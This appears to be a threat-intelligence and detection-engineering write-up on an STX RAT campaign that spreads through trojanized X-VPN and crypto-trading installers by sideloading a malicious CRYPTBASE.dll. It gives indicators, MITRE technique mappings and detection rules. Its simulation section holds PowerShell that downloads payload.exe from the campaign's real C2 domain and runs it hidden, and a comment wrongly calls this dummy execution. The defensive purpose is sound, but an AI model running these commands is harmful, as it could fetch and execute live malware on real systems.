STX RAT Supply Chain Attack Hits Wallets and X-VPN

Summary

Researchers uncovered an active supply chain campaign in which a threat actor abused DLL sideloading with a malicious CRYPTBASE.dll to deploy the STX RAT remote access trojan through trojanized installers for cryptocurrency trading software and the X-VPN client. The operation relied on a single Bitbucket repository to distribute the infected packages and rotated command-and-control domains under the supp0v3.com root. By targeting both users of financial exchange tools and a widely used VPN service, the attackers positioned themselves to steal credentials and other sensitive data at scale. Detection content was updated to cover the shared sideloading method and the common infrastructure.

Investigation

Analysts identified 11 malicious packages that all used the same CRYPTBASE.dll sideloading chain to load STX RAT directly in memory. The trojanized installers were hosted in a Bitbucket repository named amos-trading, and commit metadata linked the activity to the alias Leda Elacoate. After public exposure, the operators rotated infrastructure from helloworld.supp0v3.com to welcome.supp0v3.com. YARA analysis confirmed that STX RAT was the final payload in every examined sample.

Mitigation

X-VPN addressed the issue in Windows version 77.5.3, which enforces strict DLL loading from system directories, performs startup-time DLL hash validation, and applies per-process loading policies. Blocking supp0v3.com and its subdomains at the network perimeter can disrupt command-and-control traffic. Organizations should also reinforce software download hygiene and limit installations to verified vendor sources.

Response

Defenders should alert on any process that loads CRYPTBASE.dll from a non-system path and investigate for signs of in-memory STX RAT execution. The published STX RAT YARA rule should be deployed across EDR platforms, and outbound HTTPS traffic to supp0v3.com should be monitored closely. All endpoints should be updated to the patched X-VPN version or have the vulnerable software removed. Threat hunting should also focus on reflective code-loading behavior associated with the malware’s multi-stage unpacking chain.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["Technique – T1195.002 Supply Chain Compromise: Compromise Software Supply Chain Description: attacker injected malicious CRYPTBASE.dll into legitimate installers hosted in a Bitbucket repository."] class tech_supply_chain technique dll_cryptbase["File – Name: CRYPTBASE.dll (malicious)"] class dll_cryptbase file file_installer["File – Name: Trojanized Installer (e.g., Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["Technique – T1204.002 User Execution: Malicious File Description: victims download and run the trojanized installer."] class tech_user_exec technique tech_masquerade["Technique – T1036.008 Masquerading: Masquerade File Type Description: malicious package is presented as a legitimate VPN or cryptou2011trading installer."] class tech_masquerade technique tech_dll_hijack["Technique – T1574.001 Hijack Execution Flow: DLL Description: installer loads CRYPTBASE.dll placed in the program directory, causing the legitimate application to load the malicious DLL."] class tech_dll_hijack technique tech_path_intercept["Technique – T1574.008 Path Interception: Search Order Hijacking Description: Windows DLL search order loads the attackeru2019s DLL before the system copy."] class tech_path_intercept technique tech_reflective["Technique – T1620 Reflective Code Loading Description: the malicious DLL unpacks and injects the STX RAT payload into memory using reflective loading, leaving no onu2011disk artifacts."] class tech_reflective technique tech_embedded["Technique – T1027.009 Embedded Payloads Description: the DLL contains an embedded multiu2011stage unpack chain and the STX RAT core."] class tech_embedded technique malware_STX["Malware – Name: STX RAT Function: remote access trojan providing credential theft and data exfiltration."] class malware_STX malware tech_c2["Technique – T1071.001 Application Layer Protocol: Web Protocols Description: the RAT communicates with C2 over HTTPS to subdomains of supp0v3.com."] class tech_c2 technique tech_cred_browser["Technique – T1555.003 Credentials from Web Browsers Description: STX RAT harvests saved browser credentials, session tokens, and system account data."] class tech_cred_browser technique tech_exfil["Technique – T1041 Exfiltration Over C2 Channel Description: collected credentials and system data are exfiltrated via the same HTTPS C2 channel."] class tech_exfil technique %% Connections tech_supply_chain –>|injects| dll_cryptbase dll_cryptbase –>|placed in| file_installer file_installer –>|downloaded and executed by victim| tech_user_exec tech_user_exec –>|leads to| tech_masquerade tech_masquerade –>|enables| tech_dll_hijack tech_dll_hijack –>|uses| tech_path_intercept tech_path_intercept –>|allows| tech_reflective tech_reflective –>|loads| malware_STX malware_STX –>|uses| tech_embedded malware_STX –>|communicates via| tech_c2 malware_STX –>|harvests| tech_cred_browser tech_cred_browser –>|data exfiltrated via| tech_exfil "

Attack Flow

Detections

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)

SOC Prime Team

09 Jun 2026

View

IOCs (HashSha256) to detect: From Crypto Wallets to a 100M-User VPN: Inside an Active STX RAT Supply Chain Campaign

SOC Prime AI Rules

09 Jun 2026

View

Detection of Supp0v3.com C2 Infrastructure in STX RAT Campaign [Windows Network Connection]

SOC Prime AI Rules

09 Jun 2026

View

Detection of CRYPTBASE.dll Sideloading to Deploy STX RAT [Windows Process Creation]

SOC Prime AI Rules

09 Jun 2026

View

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

Attack Narrative & Commands:

An attacker who has compromised a low‑privilege user account uses a PowerShell one‑liner to download a malicious payload from the C2 server helloworld.supp0v3.com. This leverages T1071.001 (Web protocol C2) and T1204.002 (User execution) while the payload itself is obfuscated (T1027, T1027.009) and masqueraded as a legitimate executable (T1036.005/008). The outbound connection to the malicious domain should be captured by the firewall log and consequently fire the Sigma rule.
```
# Download malicious payload from the Supp0v3 C2 domain
$url = "http://helloworld.supp0v3.com/payload.exe"
$out = "$env:TEMPpayload.exe"
Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out

# Execute the payload (simulated – actually just creates a dummy file)
Start-Process -FilePath $out -WindowStyle Hidden
```

Regression Test Script:

# TC-20260609-A1B2C – Simulate STX RAT C2 connection to helloworld.supp0v3.com
try {
    # Step 1: Prepare dummy payload (avoid real malware execution)
    $payloadPath = "$env:TEMPpayload.exe"
    Set-Content -Path $payloadPath -Value "This is a dummy executable for testing." -Encoding ASCII

    # Step 2: Simulate outbound HTTP request to malicious domain
    $c2Url = "http://helloworld.supp0v3.com/payload.exe"
    Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath

    # Step 3: "Execute" the payload (no real execution for safety)
    Write-Host "Simulated execution of payload at $payloadPath"

    Write-Host "Simulation completed – check SIEM for alert."
}
catch {
    Write-Error "Simulation failed: $_"
}

Cleanup Commands:

# Remove the dummy payload and any residual files
$payloadPath = "$env:TEMPpayload.exe"
if (Test-Path $payloadPath) {
    Remove-Item -Path $payloadPath -Force
    Write-Host "Cleaned up payload file."
}
else {
    Write-Host "No payload file found – nothing to clean."
}